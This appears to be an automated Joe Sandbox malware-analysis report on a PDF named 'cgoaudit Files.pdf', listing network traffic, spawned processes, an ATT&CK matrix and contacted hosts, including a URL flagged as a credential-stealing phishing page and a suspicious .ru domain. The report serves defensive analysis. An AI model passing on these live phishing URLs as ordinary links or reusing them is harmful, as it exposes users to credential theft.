Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: 1z.ensfulthal.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru
Source: global trafficDNS traffic detected: DNS query: google.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3018sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSMsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:15:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ce7RThVQZpN7IE5xxKOe0P8S%2FBBHoh8iRb%2BghZ9wXUZrUs1f07CKzSk9AHtrWHxCj07mt7nKxptNhr04iq5WrdviuwnSLHWCcLvAMVDpYf7txsPzStGcJ4kTUQ9Gw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=35765&min_rtt=35703&rtt_var=13433&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2235&delivery_rate=79769&cwnd=178&unsent_bytes=0&cid=dde3c02bae362b18&ts=338&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8e92baa5a82e43bd-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1595&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1899&delivery_rate=1830721&cwnd=190&unsent_bytes=0&cid=1dc7ee277126c54b&ts=10394&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:15:17 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 9dPew8ekuUfe49GivLM65bWuEhuYsAtan7g=$oKMfFoDqJUseqOZbcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e92babeba0442de-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:15:24 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: huTP4ucGF1ZBup/KvGqHY3i3eMsMj1kfKgM=$p/c66yMZn/7vifUScache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e92bae7a98f7cfc-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:15:51 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: sSkUASCSU9aGM4eIqaK20KOas0TALMkgjqU=$dknDctx9IlE6G7mmServer: cloudflareCF-RAY: 8e92bb952b5dc47f-EWRalt-svc: h3=":443"; ma=86400
Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.3.drString found in binary or memory: http://x1.i.lencr.org/
Source: 56b88a4a-df0b-445f-a60a-66273631de5e.tmp.4.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: chromecache_182.6.drString found in binary or memory: https://www.twitter.com/favicon.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: classification engineClassification label: mal52.winPDF@37/73@29/14
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-27 09-14-38-254.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\cgoaudit Files.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1572,i,18327643351867772495,3848152203052608152,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rimpalahore.com/odin/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1972,i,16109135660613449894,198606018373725258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1572,i,18327643351867772495,3848152203052608152,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1972,i,16109135660613449894,198606018373725258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cgoaudit Files.pdfInitial sample: PDF keyword /JS count = 0
Source: cgoaudit Files.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: cgoaudit Files.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://rimpalahore.com/odin/100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://rimpalahore.com/favicon.ico0%Avira URL Cloudsafe
https://1z.ensfulthal.com/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      google.com
      142.250.181.142
      truefalse
        high
        code.jquery.com
        151.101.66.137
        truefalse
          high
          rimpalahore.com
          135.181.212.206
          truefalse
            unknown
            1z.ensfulthal.com
            104.21.52.130
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                high
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  high
                  u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru
                  172.67.191.200
                  truefalse
                    high
                    www.google.com
                    142.250.181.100
                    truefalse
                      high
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      84.201.211.18
                      truefalse
                        high
                        x1.i.lencr.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                            high
                            https://rimpalahore.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e92ba946dde8cec/1732716915077/hUzfX73lIZ5OJt-false
                                  high
                                  https://rimpalahore.com/odin/true
                                  • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                  unknown
                                  https://1z.ensfulthal.com/mw2hN4k/false
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/false
                                      high
                                      https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e92ba946dde8cec&lang=autofalse
                                          high
                                          https://1z.ensfulthal.com/favicon.icofalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8e92ba946dde8cec/1732716915079/bdcbeab1c83350eb0800e30560e9da0cfa42eeede4ecd68d3e23505d870a16af/339RObj6JSxOmMbfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://chrome.cloudflare-dns.com56b88a4a-df0b-445f-a60a-66273631de5e.tmp.4.drfalse
                                              high
                                              http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.3.drfalse
                                                high
                                                https://www.twitter.com/favicon.icochromecache_182.6.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.18.94.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  52.6.155.20
                                                  unknownUnited States
                                                  14618AMAZON-AESUSfalse
                                                  151.101.66.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  104.17.24.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  172.67.191.200
                                                  u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ruUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  142.250.181.100
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  135.181.212.206
                                                  rimpalahore.comGermany
                                                  24940HETZNER-ASDEfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  104.21.52.130
                                                  1z.ensfulthal.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.21.11.98
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.17.25.14
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.16
                                                  192.168.2.5
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1563841
                                                  Start date and time:2024-11-27 15:14:01 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 4m 20s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:cgoaudit Files.pdf
                                                  Detection:MAL
                                                  Classification:mal52.winPDF@37/73@29/14
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .pdf
